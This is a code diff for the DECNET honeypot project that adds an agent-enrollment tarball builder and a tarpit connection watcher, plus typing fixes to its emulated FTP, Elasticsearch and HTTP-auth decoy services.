ports = [5900]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
209
decnet/swarm/bundle_builder.py
Normal file
209
decnet/swarm/bundle_builder.py
Normal file
@@ -0,0 +1,209 @@
|
|||||||
|
"""Tarball + bootstrap construction for agent-enrollment bundles.
|
||||||
|
|
||||||
|
Pure I/O, no FastAPI dependency — independently testable.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import io
|
||||||
|
import os
|
||||||
|
import pathlib
|
||||||
|
import tarfile
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.swarm import pki
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Include / exclude manifest
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
# Explicit include list — fails closed. Stray files on the master
|
||||||
|
# (dev venvs, .env files, editor scratch) cannot leak into the bundle.
|
||||||
|
_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",)
|
||||||
|
_INCLUDED_DIRS: tuple[str, ...] = ("decnet",)
|
||||||
|
|
||||||
|
# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root).
|
||||||
|
# * decnet/web — FastAPI master app, unused on agents.
|
||||||
|
# * decnet/mutator — swarm-wide respawn scheduler, master-only.
|
||||||
|
# * decnet/profiler — rebuilds profiles against master DB, master-only.
|
||||||
|
_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({
|
||||||
|
"decnet/web",
|
||||||
|
"decnet/mutator",
|
||||||
|
"decnet/profiler",
|
||||||
|
})
|
||||||
|
|
||||||
|
# Agent-side systemd units. Profiler stays master-side intentionally.
|
||||||
|
_SYSTEMD_UNITS = (
|
||||||
|
"decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater",
|
||||||
|
"decnet-collector", "decnet-prober", "decnet-sniffer",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Path helpers
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _repo_root() -> pathlib.Path:
|
||||||
|
# decnet/swarm/bundle_builder.py -> parents[2] = repo root.
|
||||||
|
return pathlib.Path(__file__).resolve().parents[2]
|
||||||
|
|
||||||
|
|
||||||
|
def _templates_dir() -> pathlib.Path:
|
||||||
|
return pathlib.Path(__file__).resolve().parents[1] / "web" / "templates"
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Filesystem walk
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]:
|
||||||
|
"""Return ``(full_path, arcname)`` pairs for every file the agent needs.
|
||||||
|
|
||||||
|
Walk is pruned in-place: ``__pycache__`` and master-only subtrees are
|
||||||
|
skipped at directory level so we never descend into them.
|
||||||
|
"""
|
||||||
|
found: list[tuple[pathlib.Path, str]] = []
|
||||||
|
|
||||||
|
for rel in _INCLUDED_ROOT_FILES:
|
||||||
|
p = root / rel
|
||||||
|
if p.is_file():
|
||||||
|
found.append((p, rel))
|
||||||
|
|
||||||
|
for top in _INCLUDED_DIRS:
|
||||||
|
start = root / top
|
||||||
|
if not start.is_dir():
|
||||||
|
continue
|
||||||
|
for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False):
|
||||||
|
dir_path = pathlib.Path(dirpath)
|
||||||
|
rel_dir = dir_path.relative_to(root).as_posix()
|
||||||
|
|
||||||
|
dirnames[:] = [
|
||||||
|
d for d in dirnames
|
||||||
|
if d != "__pycache__"
|
||||||
|
and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES
|
||||||
|
]
|
||||||
|
|
||||||
|
for fn in filenames:
|
||||||
|
if fn.endswith((".pyc", ".pyo")):
|
||||||
|
continue
|
||||||
|
full = dir_path / fn
|
||||||
|
if full.is_symlink():
|
||||||
|
continue
|
||||||
|
found.append((full, f"{rel_dir}/{fn}"))
|
||||||
|
|
||||||
|
found.sort(key=lambda t: t[1])
|
||||||
|
return found
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Content renderers
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _render_decnet_ini(
|
||||||
|
master_host: str,
|
||||||
|
host_uuid: str,
|
||||||
|
use_ipvlan: bool = False,
|
||||||
|
swarmctl_port: int = 8770,
|
||||||
|
) -> bytes:
|
||||||
|
ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n"
|
||||||
|
return (
|
||||||
|
"; Generated by DECNET agent-enrollment bundle.\n"
|
||||||
|
"[decnet]\n"
|
||||||
|
"mode = agent\n"
|
||||||
|
"disallow-master = true\n"
|
||||||
|
"log-directory = /var/log/decnet\n"
|
||||||
|
f"{ipvlan_line}"
|
||||||
|
"\n"
|
||||||
|
"[agent]\n"
|
||||||
|
f"master-host = {master_host}\n"
|
||||||
|
f"swarmctl-port = {swarmctl_port}\n"
|
||||||
|
"swarm-syslog-port = 6514\n"
|
||||||
|
"agent-port = 8765\n"
|
||||||
|
"agent-dir = /etc/decnet/agent\n"
|
||||||
|
"updater-dir = /etc/decnet/updater\n"
|
||||||
|
f"host-uuid = {host_uuid}\n"
|
||||||
|
).encode()
|
||||||
|
|
||||||
|
|
||||||
|
def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None:
|
||||||
|
info = tarfile.TarInfo(name)
|
||||||
|
info.size = len(data)
|
||||||
|
info.mode = mode
|
||||||
|
info.mtime = int(datetime.now(timezone.utc).timestamp())
|
||||||
|
tar.addfile(info, io.BytesIO(data))
|
||||||
|
|
||||||
|
|
||||||
|
def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes:
|
||||||
|
tpl_path = _templates_dir() / f"{name}.service.j2"
|
||||||
|
tpl = tpl_path.read_text()
|
||||||
|
return (
|
||||||
|
tpl.replace("{{ agent_name }}", agent_name)
|
||||||
|
.replace("{{ master_host }}", master_host)
|
||||||
|
).encode()
|
||||||
|
|
||||||
|
|
||||||
|
def render_bootstrap(
|
||||||
|
agent_name: str,
|
||||||
|
master_host: str,
|
||||||
|
tarball_url: str,
|
||||||
|
expires_at: datetime,
|
||||||
|
with_updater: bool,
|
||||||
|
) -> bytes:
|
||||||
|
tpl_path = _templates_dir() / "enroll_bootstrap.sh.j2"
|
||||||
|
tpl = tpl_path.read_text()
|
||||||
|
now = datetime.now(timezone.utc).replace(microsecond=0).isoformat()
|
||||||
|
rendered = (
|
||||||
|
tpl.replace("{{ agent_name }}", agent_name)
|
||||||
|
.replace("{{ master_host }}", master_host)
|
||||||
|
.replace("{{ tarball_url }}", tarball_url)
|
||||||
|
.replace("{{ generated_at }}", now)
|
||||||
|
.replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat())
|
||||||
|
.replace("{{ with_updater }}", "true" if with_updater else "false")
|
||||||
|
)
|
||||||
|
return rendered.encode()
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Public API
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def build_tarball(
|
||||||
|
master_host: str,
|
||||||
|
agent_name: str,
|
||||||
|
host_uuid: str,
|
||||||
|
issued: pki.IssuedCert,
|
||||||
|
services_ini: Optional[str],
|
||||||
|
updater_issued: Optional[pki.IssuedCert] = None,
|
||||||
|
use_ipvlan: bool = False,
|
||||||
|
) -> bytes:
|
||||||
|
"""Return a gzipped tarball ready to be handed to the enrolling agent."""
|
||||||
|
root = _repo_root()
|
||||||
|
buf = io.BytesIO()
|
||||||
|
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
|
||||||
|
for path, arcname in _iter_included(root):
|
||||||
|
tar.add(path, arcname=arcname, recursive=False)
|
||||||
|
|
||||||
|
_add_bytes(
|
||||||
|
tar,
|
||||||
|
"etc/decnet/decnet.ini",
|
||||||
|
_render_decnet_ini(master_host, host_uuid, use_ipvlan),
|
||||||
|
)
|
||||||
|
for unit in _SYSTEMD_UNITS:
|
||||||
|
_add_bytes(
|
||||||
|
tar,
|
||||||
|
f"etc/systemd/system/{unit}.service",
|
||||||
|
_render_systemd_unit(unit, agent_name, master_host),
|
||||||
|
)
|
||||||
|
_add_bytes(tar, "home/.decnet/agent/ca.crt", issued.ca_cert_pem)
|
||||||
|
_add_bytes(tar, "home/.decnet/agent/worker.crt", issued.cert_pem)
|
||||||
|
_add_bytes(tar, "home/.decnet/agent/worker.key", issued.key_pem, mode=0o600)
|
||||||
|
|
||||||
|
if updater_issued is not None:
|
||||||
|
_add_bytes(tar, "home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem)
|
||||||
|
_add_bytes(tar, "home/.decnet/updater/updater.crt", updater_issued.cert_pem)
|
||||||
|
_add_bytes(tar, "home/.decnet/updater/updater.key", updater_issued.key_pem, mode=0o600)
|
||||||
|
|
||||||
|
if services_ini:
|
||||||
|
_add_bytes(tar, "services.ini", services_ini.encode())
|
||||||
|
|
||||||
|
return buf.getvalue()
|
||||||
3
decnet/tarpit/__init__.py
Normal file
3
decnet/tarpit/__init__.py
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
from .worker import tarpit_watcher_worker
|
||||||
|
|
||||||
|
__all__ = ["tarpit_watcher_worker"]
|
||||||
208
decnet/tarpit/worker.py
Normal file
208
decnet/tarpit/worker.py
Normal file
@@ -0,0 +1,208 @@
|
|||||||
|
"""Tarpit connection watcher — edge-triggered enter/exit log events.
|
||||||
|
|
||||||
|
Polls active tarpit rules every ``DECNET_TARPIT_POLL_INTERVAL`` seconds
|
||||||
|
(default 15). For each rule, reads ``/proc/{pid}/net/tcp`` on the host
|
||||||
|
(no docker exec, no ss needed inside the container) to find ESTABLISHED
|
||||||
|
connections on the tarpitted ports. Emits structured log events:
|
||||||
|
|
||||||
|
* ``tarpit_enter`` — new connection seen on a tarpitted port
|
||||||
|
* ``tarpit_exit`` — connection gone; includes elapsed time in seconds
|
||||||
|
|
||||||
|
Runs embedded in the API process (always-on, near-zero cost when no
|
||||||
|
rules exist).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import json
|
||||||
|
import socket
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.decky_io.resolve import resolve_decky_container
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.network import get_container_pid
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
log = get_logger("tarpit.watcher")
|
||||||
|
|
||||||
|
_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL"
|
||||||
|
_DEFAULT_POLL_S = 15
|
||||||
|
|
||||||
|
_TCP_ESTABLISHED = "01"
|
||||||
|
|
||||||
|
|
||||||
|
def _read_proc_net_tcp(pid: int) -> str:
|
||||||
|
"""Read /proc/{pid}/net/tcp from the host (namespace-aware symlink)."""
|
||||||
|
path = f"/proc/{pid}/net/tcp"
|
||||||
|
try:
|
||||||
|
with open(path) as f:
|
||||||
|
return f.read()
|
||||||
|
except OSError:
|
||||||
|
return ""
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_connections(content: str, target_port: int) -> list[str]:
|
||||||
|
"""Return list of remote IPs in ESTABLISHED state on target_port."""
|
||||||
|
ips: list[str] = []
|
||||||
|
for line in content.strip().splitlines()[1:]:
|
||||||
|
parts = line.split()
|
||||||
|
if len(parts) < 4:
|
||||||
|
continue
|
||||||
|
local_hex, rem_hex, state = parts[1], parts[2], parts[3]
|
||||||
|
if state != _TCP_ESTABLISHED:
|
||||||
|
continue
|
||||||
|
local_port = int(local_hex.split(":")[1], 16)
|
||||||
|
if local_port != target_port:
|
||||||
|
continue
|
||||||
|
rem_ip_hex = rem_hex.split(":")[0]
|
||||||
|
try:
|
||||||
|
ip_bytes = bytes.fromhex(rem_ip_hex)[::-1]
|
||||||
|
ip = socket.inet_ntoa(ip_bytes)
|
||||||
|
except (ValueError, OSError):
|
||||||
|
continue
|
||||||
|
if ip != "0.0.0.0": # nosec B104
|
||||||
|
ips.append(ip)
|
||||||
|
return ips
|
||||||
|
|
||||||
|
|
||||||
|
def _get_poll_interval() -> int:
|
||||||
|
import os
|
||||||
|
try:
|
||||||
|
return int(os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S))
|
||||||
|
except (TypeError, ValueError):
|
||||||
|
return _DEFAULT_POLL_S
|
||||||
|
|
||||||
|
|
||||||
|
async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]:
|
||||||
|
try:
|
||||||
|
from decnet.web.db.models import Attacker
|
||||||
|
from sqlalchemy import select
|
||||||
|
async with repo._session() as session: # type: ignore[attr-defined]
|
||||||
|
result = await session.execute(
|
||||||
|
select(Attacker).where(Attacker.ip == ip) # type: ignore[arg-type]
|
||||||
|
)
|
||||||
|
row = result.scalar_one_or_none()
|
||||||
|
return row.uuid if row else None
|
||||||
|
except Exception:
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
async def _emit_log(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
event_type: str,
|
||||||
|
decky_name: str,
|
||||||
|
src_ip: str,
|
||||||
|
port: int,
|
||||||
|
extra: dict[str, Any] | None = None,
|
||||||
|
) -> None:
|
||||||
|
attacker_uuid = await _get_attacker_uuid(repo, src_ip)
|
||||||
|
fields: dict[str, Any] = {"port": port, "attacker_uuid": attacker_uuid}
|
||||||
|
if extra:
|
||||||
|
fields.update(extra)
|
||||||
|
try:
|
||||||
|
await repo.add_log({
|
||||||
|
"decky": decky_name,
|
||||||
|
"service": "tarpit",
|
||||||
|
"event_type": event_type,
|
||||||
|
"attacker_ip": src_ip,
|
||||||
|
"raw_line": f"tarpit {event_type} src={src_ip} decky={decky_name} port={port}",
|
||||||
|
"fields": json.dumps(fields),
|
||||||
|
})
|
||||||
|
except Exception as exc:
|
||||||
|
log.warning("tarpit log emit failed: %s", exc)
|
||||||
|
|
||||||
|
|
||||||
|
async def tarpit_watcher_worker(repo: BaseRepository) -> None:
|
||||||
|
"""Main loop — runs forever, wakes every DECNET_TARPIT_POLL_INTERVAL seconds."""
|
||||||
|
poll_interval = _get_poll_interval()
|
||||||
|
log.info("tarpit watcher started poll_interval=%ds", poll_interval)
|
||||||
|
|
||||||
|
# (decky_name, src_ip, port) → first_seen timestamp
|
||||||
|
seen: dict[tuple[str, str, int], datetime] = {}
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
await _tick(repo, seen)
|
||||||
|
except asyncio.CancelledError:
|
||||||
|
raise
|
||||||
|
except Exception as exc:
|
||||||
|
log.warning("tarpit watcher tick error: %s", exc)
|
||||||
|
await asyncio.sleep(poll_interval)
|
||||||
|
|
||||||
|
|
||||||
|
async def _tick(
|
||||||
|
repo: BaseRepository,
|
||||||
|
seen: dict[tuple[str, str, int], datetime],
|
||||||
|
) -> None:
|
||||||
|
rules = await repo.list_tarpit_rules()
|
||||||
|
if not rules:
|
||||||
|
# No active tarpit rules — clear stale seen state and bail early.
|
||||||
|
seen.clear()
|
||||||
|
return
|
||||||
|
|
||||||
|
current: set[tuple[str, str, int]] = set()
|
||||||
|
|
||||||
|
for rule in rules:
|
||||||
|
db_key: str = rule["decky_name"]
|
||||||
|
ports: list[int] = rule["ports"]
|
||||||
|
|
||||||
|
# Topology deckies are stored as "t:{topology_id}:{decky_name}".
|
||||||
|
# Resolve the real container name before asking Docker for its PID.
|
||||||
|
if db_key.startswith("t:"):
|
||||||
|
_, topology_id, decky_name = db_key.split(":", 2)
|
||||||
|
try:
|
||||||
|
container = await resolve_decky_container(
|
||||||
|
repo, decky_name, topology_id=topology_id,
|
||||||
|
)
|
||||||
|
except LookupError as exc:
|
||||||
|
log.debug("tarpit watcher: %s", exc)
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
decky_name = db_key
|
||||||
|
container = db_key
|
||||||
|
|
||||||
|
try:
|
||||||
|
pid = await asyncio.to_thread(get_container_pid, container)
|
||||||
|
except LookupError as exc:
|
||||||
|
log.debug("tarpit watcher: %s", exc)
|
||||||
|
continue
|
||||||
|
|
||||||
|
tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid)
|
||||||
|
|
||||||
|
for port in ports:
|
||||||
|
for src_ip in _parse_connections(tcp_content, port):
|
||||||
|
key = (decky_name, src_ip, port)
|
||||||
|
current.add(key)
|
||||||
|
if key not in seen:
|
||||||
|
seen[key] = datetime.now(timezone.utc)
|
||||||
|
log.info(
|
||||||
|
"tarpit enter decky=%s src=%s port=%d",
|
||||||
|
decky_name, src_ip, port,
|
||||||
|
)
|
||||||
|
await _emit_log(
|
||||||
|
repo,
|
||||||
|
event_type="tarpit_enter",
|
||||||
|
decky_name=decky_name,
|
||||||
|
src_ip=src_ip,
|
||||||
|
port=port,
|
||||||
|
)
|
||||||
|
|
||||||
|
for key in list(seen):
|
||||||
|
if key not in current:
|
||||||
|
first_seen = seen.pop(key)
|
||||||
|
elapsed = int((datetime.now(timezone.utc) - first_seen).total_seconds())
|
||||||
|
decky_name, src_ip, port = key
|
||||||
|
log.info(
|
||||||
|
"tarpit exit decky=%s src=%s port=%d elapsed=%ds",
|
||||||
|
decky_name, src_ip, port, elapsed,
|
||||||
|
)
|
||||||
|
await _emit_log(
|
||||||
|
repo,
|
||||||
|
event_type="tarpit_exit",
|
||||||
|
decky_name=decky_name,
|
||||||
|
src_ip=src_ip,
|
||||||
|
port=port,
|
||||||
|
extra={"duration_s": elapsed},
|
||||||
|
)
|
||||||
@@ -138,7 +138,7 @@ def traced(fn: F) -> F: ...
|
|||||||
def traced(name: str) -> Callable[[F], F]: ...
|
def traced(name: str) -> Callable[[F], F]: ...
|
||||||
|
|
||||||
|
|
||||||
def traced(fn: Any = None, *, name: str | None = None) -> Any:
|
def traced(fn: Any = None, *, name: str | None = None) -> Any: # type: ignore[misc]
|
||||||
"""Decorator that wraps a function in an OTEL span.
|
"""Decorator that wraps a function in an OTEL span.
|
||||||
|
|
||||||
Usage::
|
Usage::
|
||||||
@@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any:
|
|||||||
# Called as @traced (no arguments)
|
# Called as @traced (no arguments)
|
||||||
return _wrap(fn, None)
|
return _wrap(fn, None)
|
||||||
# Fallback: @traced() with no args
|
# Fallback: @traced() with no args
|
||||||
def decorator(f: F) -> F:
|
def _fallback_decorator(f: F) -> F:
|
||||||
return _wrap(f, name)
|
return _wrap(f, name)
|
||||||
return decorator
|
return _fallback_decorator
|
||||||
|
|
||||||
|
|
||||||
def _wrap(fn: F, span_name: str | None) -> F:
|
def _wrap(fn: F, span_name: str | None) -> F:
|
||||||
|
|||||||
@@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]:
|
|||||||
if domain:
|
if domain:
|
||||||
principal = f"{domain}\\{username}"
|
principal = f"{domain}\\{username}"
|
||||||
else:
|
else:
|
||||||
principal = username or None
|
principal = username
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"username": username,
|
"username": username,
|
||||||
|
|||||||
@@ -128,6 +128,9 @@ def main():
|
|||||||
signal.signal(signal.SIGINT, _forward)
|
signal.signal(signal.SIGINT, _forward)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
if proc.stdout is None:
|
||||||
|
proc.wait()
|
||||||
|
return
|
||||||
for raw_line in proc.stdout:
|
for raw_line in proc.stdout:
|
||||||
line = raw_line.rstrip()
|
line = raw_line.rstrip()
|
||||||
if not line:
|
if not line:
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler):
|
|||||||
server_version = "elasticsearch"
|
server_version = "elasticsearch"
|
||||||
sys_version = ""
|
sys_version = ""
|
||||||
|
|
||||||
def _send_json(self, code: int, data: dict) -> None:
|
def _send_json(self, code: int, data: dict | list) -> None:
|
||||||
body = json.dumps(data).encode()
|
body = json.dumps(data).encode()
|
||||||
self.send_response(code)
|
self.send_response(code)
|
||||||
self.send_header("Content-Type", "application/json; charset=UTF-8")
|
self.send_header("Content-Type", "application/json; charset=UTF-8")
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set.
|
|||||||
|
|
||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
from typing import cast
|
||||||
|
|
||||||
from twisted.internet import defer, reactor
|
from twisted.internet import defer, reactor
|
||||||
|
from twisted.internet.interfaces import IReactorTCP
|
||||||
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
|
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
|
||||||
|
from twisted.python.failure import Failure
|
||||||
from twisted.python.filepath import FilePath
|
from twisted.python.filepath import FilePath
|
||||||
from twisted.python import log as twisted_log
|
from twisted.python import log as twisted_log
|
||||||
|
|
||||||
@@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs()
|
|||||||
|
|
||||||
class ServerFTP(FTP):
|
class ServerFTP(FTP):
|
||||||
def connectionMade(self):
|
def connectionMade(self):
|
||||||
peer = self.transport.getPeer()
|
assert self.transport is not None
|
||||||
|
peer = self.transport.getPeer() # type: ignore[misc]
|
||||||
_log("connection", src_ip=peer.host, src_port=peer.port)
|
_log("connection", src_ip=peer.host, src_port=peer.port)
|
||||||
super().connectionMade()
|
super().connectionMade()
|
||||||
|
|
||||||
@@ -120,15 +124,16 @@ class ServerFTP(FTP):
|
|||||||
return defer.succeed((530, "Login incorrect."))
|
return defer.succeed((530, "Login incorrect."))
|
||||||
self.state = self.AUTHED
|
self.state = self.AUTHED
|
||||||
self._user = getattr(self, "_server_user", "anonymous")
|
self._user = getattr(self, "_server_user", "anonymous")
|
||||||
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH))
|
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment]
|
||||||
return defer.succeed((230, "Login successful."))
|
return defer.succeed((230, "Login successful."))
|
||||||
|
|
||||||
def ftp_RETR(self, path):
|
def ftp_RETR(self, path):
|
||||||
_log("download_attempt", path=path)
|
_log("download_attempt", path=path)
|
||||||
return super().ftp_RETR(path)
|
return super().ftp_RETR(path)
|
||||||
|
|
||||||
def connectionLost(self, reason):
|
def connectionLost(self, reason: Failure) -> None: # type: ignore[override]
|
||||||
peer = self.transport.getPeer()
|
assert self.transport is not None
|
||||||
|
peer = self.transport.getPeer() # type: ignore[misc]
|
||||||
_log("disconnect", src_ip=peer.host, src_port=peer.port)
|
_log("disconnect", src_ip=peer.host, src_port=peer.port)
|
||||||
super().connectionLost(reason)
|
super().connectionLost(reason)
|
||||||
|
|
||||||
@@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory):
|
|||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
|
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
|
||||||
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
|
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
|
||||||
reactor.listenTCP(PORT, ServerFTPFactory())
|
cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type]
|
||||||
reactor.run()
|
reactor.run() # type: ignore[attr-defined]
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user